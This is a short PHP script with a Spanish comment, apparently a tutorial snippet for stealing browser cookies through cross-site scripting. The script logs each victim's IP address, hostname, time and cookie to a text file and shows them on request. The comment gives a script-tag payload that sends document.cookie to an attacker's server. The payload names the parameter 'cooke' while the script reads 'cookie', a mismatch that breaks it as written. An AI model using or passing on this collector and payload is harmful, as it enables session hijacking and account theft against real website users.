<?php
if(isset($_GET["leer"])) {
$read = file_get_contents("cookie.txt");
echo $read;
} else {
$cookie = $_GET["cookie"];
$texto = "Ip: ".$_SERVER["REMOTE_ADDR"] . " - ISP : ".gethostbyaddr($_SERVER["REMOTE_ADDR"])." - Fecha: ".date("H:i:s d/m/Y")." - Cookie: ".$cookie."<br>";
$l = file_get_contents("cookie.txt");
file_put_contents("cookie.txt",$texto.$l);
}
?>
Esto es util cuando cogemos una xss, y la explotamos por ejemplo:
<script>location.href=\'http://urldetuweb.com/fichero.php?cooke=\'+document .cookie;</script>